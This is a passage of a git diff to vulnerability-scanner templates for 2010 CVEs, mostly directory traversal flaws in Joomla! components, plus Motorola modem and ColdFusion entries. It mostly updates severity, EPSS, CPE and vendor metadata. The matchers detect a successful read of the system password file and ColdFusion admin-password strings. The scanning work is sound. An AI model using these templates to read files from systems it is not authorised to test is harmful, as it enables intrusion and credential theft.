matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index ab64b59947..efbe552f45 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -16,9 +16,13 @@ info: cvss-score: 7.5 cve-id: CVE-2010-1977 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.00826 + cpe: cpe:2.3:a:gohigheris:com_jwhmcs:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: gohigheris + product: com_jwhmcs + tags: edb,cve,cve2010,joomla,lfi http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index b755873d71..07670c883b 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -3,22 +3,26 @@ id: CVE-2010-1979 info: name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12088 - https://nvd.nist.gov/vuln/detail/CVE-2010-1979 - - http://web.archive.org/web/20140724185517/http://secunia.com/advisories/39360/ - http://www.exploit-db.com/exploits/12088 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57570 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1979 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.00826 + cpe: cpe:2.3:a:affiliatefeeds:com_datafeeds:build_880:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: affiliatefeeds + product: com_datafeeds + tags: edb,cve,cve2010,joomla,lfi http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml index ec6581b133..a4968faa69 100644 --- a/http/cves/2010/CVE-2010-1980.yaml +++ b/http/cves/2010/CVE-2010-1980.yaml @@ -10,15 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-1980 - http://packetstormsecurity.org/1004-exploits/joomlaflickr-lfi.txt - http://www.exploit-db.com/exploits/12085 + - http://bitbucket.org/roberto.aloi/joomla-flickr/changeset/64ebf6b25030 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1980 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.02401 + cpe: cpe:2.3:a:roberto_aloi:com_joomlaflickr:1.0.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: roberto_aloi + product: com_joomlaflickr + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index 140b1e9262..2dadcf4575 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -3,22 +3,28 @@ id: CVE-2010-1981 info: name: Joomla! Component Fabrik 2.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12087 - https://nvd.nist.gov/vuln/detail/CVE-2010-1981 - http://packetstormsecurity.org/1004-exploits/joomlafabrik-lfi.txt - http://www.exploit-db.com/exploits/12087 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57571 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1981 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00656 + cpe: cpe:2.3:a:fabrikar:fabrik:2.0:*:*:*:*:joomla\!:*:* metadata: max-request: 1 + framework: joomla\! + vendor: fabrikar + product: fabrik + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index 06e997b4d7..a3035e45ed 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1982 info: name: Joomla! Component JA Voice 2.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12121 @@ -16,9 +16,13 @@ info: cvss-score: 5 cve-id: CVE-2010-1982 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.00477 + cpe: cpe:2.3:a:joomlart:com_javoice:2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlart + product: com_javoice + tags: cve,cve2010,joomla,lfi,edb http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index 8ead882707..4f76e50da3 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -10,15 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-1983 - http://packetstormsecurity.org/1004-exploits/joomlaredtwitter-lfi.txt - http://www.exploit-db.com/exploits/12055 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57511 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1983 cwe-id: CWE-22 - tags: joomla,lfi,edb,packetstorm,cve,cve2010 + epss-score: 0.01815 + cpe: cpe:2.3:a:redcomponent:com_redtwitter:1.0b8:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: redcomponent + product: com_redtwitter + tags: joomla,lfi,edb,packetstorm,cve,cve2010 http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index 4b9c526519..b885207246 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -16,9 +16,13 @@ info: cvss-score: 7.5 cve-id: CVE-2010-2033 cwe-id: CWE-22 - tags: packetstorm,cve,cve2010,joomla,lfi + epss-score: 0.00826 + cpe: cpe:2.3:a:percha:com_perchacategoriestree:0.6:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: percha + product: com_perchacategoriestree + tags: packetstorm,cve,cve2010,joomla,lfi http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index b4ed8ecf78..14273b3928 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -13,12 +13,16 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-2034 cwe-id: CWE-22 - cvss-score: 7.5 - tags: edb,packetstorm,cve,cve2010,joomla,lfi + epss-score: 0.00718 + cpe: cpe:2.3:a:percha:com_perchaimageattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: percha + product: com_perchaimageattach + tags: edb,packetstorm,cve,cve2010,joomla,lfi http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index 6829d4b263..d7c6ef1cbd 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -13,12 +13,16 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-2035 cwe-id: CWE-22 - cvss-score: 7.5 - tags: packetstorm,cve,cve2010,joomla,lfi,edb + epss-score: 0.00718 + cpe: cpe:2.3:a:percha:com_perchagallery:1.6:beta:*:*:*:*:*:* metadata: max-request: 1 + vendor: percha + product: com_perchagallery + tags: packetstorm,cve,cve2010,joomla,lfi,edb http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index 6c466e29b1..32338a27cf 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -13,12 +13,16 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-2036 cwe-id: CWE-22 - cvss-score: 7.5 - tags: cve2010,lfi,joomla,edb,packetstorm,cve + epss-score: 0.00718 + cpe: cpe:2.3:a:percha:com_perchafieldsattach:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: percha + product: com_perchafieldsattach + tags: cve2010,lfi,joomla,edb,packetstorm,cve http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index 98edd8178e..b08f6315d0 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -13,12 +13,16 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-2037 cwe-id: CWE-22 - cvss-score: 7.5 - tags: joomla,edb,packetstorm,cve,cve2010,lfi + epss-score: 0.00718 + cpe: cpe:2.3:a:percha:com_perchadownloadsattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: percha + product: com_perchadownloadsattach + tags: joomla,edb,packetstorm,cve,cve2010,lfi http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index 81656ed53a..afa6643c0f 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -9,15 +9,20 @@ info: - https://www.exploit-db.com/exploits/12595 - https://nvd.nist.gov/vuln/detail/CVE-2010-2045 - http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58574 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2045 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.01671 + cpe: cpe:2.3:a:dionesoft:com_dioneformwizard:1.0.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dionesoft + product: com_dioneformwizard + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 6ec6a99e60..70bf23e240 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -8,17 +8,22 @@ info: reference: - https://www.exploit-db.com/exploits/12611 - https://nvd.nist.gov/vuln/detail/CVE-2010-2050 - - http://web.archive.org/web/20210121200643/https://www.securityfocus.com/bid/40185/ - http://packetstormsecurity.org/1005-exploits/joomlamscomment-lfi.txt + - http://www.vupen.com/english/advisories/2010/1159 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58619 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2050 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.03527 + cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:* metadata: max-request: 1 + vendor: m0r0n + product: com_mscomment + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index 0ac90af4df..8034b4f47b 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -3,22 +3,27 @@ id: CVE-2010-2122 info: name: Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12623 - https://nvd.nist.gov/vuln/detail/CVE-2010-2122 - https://www.exploit-db.com/exploits/12618 - - http://web.archive.org/web/20210624180854/https://www.securityfocus.com/bid/40192 + - http://extensions.joomla.org/extensions/directory-a-documentation/downloads/10717 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58625 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2122 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01806 + cpe: cpe:2.3:a:joelrowley:com_simpledownload:0.9.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joelrowley + product: com_simpledownload + tags: cve,cve2010,joomla,lfi,edb http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index 6bf86733f6..385ffa3864 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -8,17 +8,21 @@ info: reference: - https://www.exploit-db.com/exploits/12607 - https://nvd.nist.gov/vuln/detail/CVE-2010-2128 - - http://web.archive.org/web/20140801195113/http://secunia.com/advisories/39832/ - http://www.exploit-db.com/exploits/12607 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58593 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2128 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01242 + cpe: cpe:2.3:a:harmistechnology:com_jequoteform:1.0:b1:*:*:*:*:*:* metadata: max-request: 1 + vendor: harmistechnology + product: com_jequoteform + tags: cve,cve2010,joomla,lfi,edb http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index b42c644237..9edc715cde 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -8,17 +8,21 @@ info: reference: - https://www.exploit-db.com/exploits/10946 - https://nvd.nist.gov/vuln/detail/CVE-2010-2259 - - http://web.archive.org/web/20140724121430/http://secunia.com/advisories/37866/ - http://www.exploit-db.com/exploits/10946 + - http://www.tamlyncreative.com.au/software/forum/index.php?topic=641.0 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2259 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.01671 + cpe: cpe:2.3:a:tamlyncreative:com_bfsurvey_profree:1.2.6:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: tamlyncreative + product: com_bfsurvey_profree + tags: cve2010,joomla,lfi,edb,cve http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index a604f1db68..6a9e361b0e 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -3,22 +3,26 @@ id: CVE-2010-2307 info: name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal author: daffainfo - severity: high + severity: medium description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. reference: - - http://web.archive.org/web/20210120195654/https://www.securityfocus.com/bid/40550/info - https://nvd.nist.gov/vuln/detail/CVE-2010-2307 - https://www.exploit-db.com/exploits/12865 - http://www.exploit-db.com/exploits/12865 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/59113 remediation: Upgrade to a supported product version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-2307 cwe-id: CWE-22 - tags: cve2010,iot,lfi,motorola,edb,cve + epss-score: 0.00832 + cpe: cpe:2.3:h:motorola:surfboard_sbv6120e:sbv6x2x-1.0.0.5-scm-02-shpc:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: motorola + product: surfboard_sbv6120e + tags: cve2010,iot,lfi,motorola,edb,cve http: - method: GET diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index d9aa1e6b52..6f99dcfd7e 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -3,22 +3,26 @@ id: CVE-2010-2507 info: name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/13981 - https://nvd.nist.gov/vuln/detail/CVE-2010-2507 - - http://web.archive.org/web/20140805070317/http://secunia.com/advisories/40297/ - http://packetstormsecurity.org/1006-exploits/joomlapicasa2gallery-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/59669 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2507 cwe-id: CWE-22 - tags: edb,packetstorm,cve,cve2010,joomla,lfi + epss-score: 0.01671 + cpe: cpe:2.3:a:masselink:com_picasa2gallery:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: masselink + product: com_picasa2gallery + tags: edb,packetstorm,cve,cve2010,joomla,lfi http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index becf360652..28ffb28449 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -3,22 +3,26 @@ id: CVE-2010-2680 info: name: Joomla! Component jesectionfinder - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/14064 - https://nvd.nist.gov/vuln/detail/CVE-2010-2680 - http://packetstormsecurity.org/1006-exploits/joomlajesectionfinder-lfi.txt - - http://web.archive.org/web/20210121201853/https://www.securityfocus.com/bid/41163/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/59796 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2680 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00826 + cpe: cpe:2.3:a:harmistechnology:com_jesectionfinder:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: harmistechnology + product: com_jesectionfinder + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index 6bfe799c9f..2b194116fe 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -10,15 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-2682 - http://packetstormsecurity.org/1004-exploits/joomlarealtyna-lfi.txt - http://www.exploit-db.com/exploits/14017 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57647 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2682 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00826 + cpe: cpe:2.3:a:realtyna:com_realtyna:1.0.15:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: realtyna + product: com_realtyna + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index a51e09c9fc..1b13e60007 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -3,22 +3,26 @@ id: CVE-2010-2857 info: name: Joomla! Component Music Manager - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html. reference: - https://www.exploit-db.com/exploits/14274 - https://nvd.nist.gov/vuln/detail/CVE-2010-2857 - - http://web.archive.org/web/20210121202225/https://www.securityfocus.com/bid/41485/ - http://www.exploit-db.com/exploits/14274 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/60195 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2857 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.00826 + cpe: cpe:2.3:a:danieljamesscott:com_music:0.1:-:*:*:*:*:*:* metadata: max-request: 1 + vendor: danieljamesscott + product: com_music + tags: cve2010,joomla,lfi,edb,cve http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index 14a3259e9b..524e62f948 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -9,15 +9,21 @@ info: - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 - http://www.adobe.com/support/security/bulletins/apsb10-18.html - http://securityreason.com/securityalert/8148 + - http://securityreason.com/securityalert/8137 + - http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/ remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2861 cwe-id: CWE-22 + epss-score: 0.97295 + cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.component:"Adobe ColdFusion" + vendor: adobe + product: coldfusion tags: adobe,kev,vulhub,cve,cve2010,coldfusion,lfi http: @@ -27,12 +33,11 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "rdspassword=" - "encrypted=" - part: body condition: and - type: status diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index d3bc05a979..89eabf26a0 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -8,17 +8,22 @@ info: reference: - https://www.exploit-db.com/exploits/31708 - https://nvd.nist.gov/vuln/detail/CVE-2010-2918 - - http://web.archive.org/web/20210127190100/https://www.securityfocus.com/bid/28942/ - https://www.exploit-db.com/exploits/14476 + - http://www.vupen.com/english/advisories/2010/1925 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/42025 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2918 cwe-id: CWE-94 - tags: joomla,lfi,edb,cve,cve2010 + epss-score: 0.02847 + cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:* metadata: max-request: 1 + vendor: visocrea + product: com_joomla_visites + tags: joomla,lfi,edb,cve,cve2010 http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index 0caf40d12b..82f82298e8 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -3,21 +3,26 @@ id: CVE-2010-2920 info: name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12120 - https://nvd.nist.gov/vuln/detail/CVE-2010-2920 - http://www.vupen.com/english/advisories/2010/1844 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57660 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2920 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.03527 + cpe: cpe:2.3:a:foobla:com_foobla_suggestions:1.5.1.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: foobla + product: com_foobla_suggestions + tags: cve,cve2010,joomla,lfi,edb http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index 80114ae6c5..5680273239 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -3,7 +3,7 @@ id: CVE-2010-3203 info: name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. reference: - https://www.exploit-db.com/exploits/14845 @@ -13,12 +13,16 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2010-3203 cwe-id: CWE-22 - cvss-score: 5.0 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.00626 + cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xmlswf + product: com_picsell + tags: edb,cve,cve2010,joomla,lfi http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index be59db13bf..7b0ebdf427 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -10,15 +10,20 @@ info: - 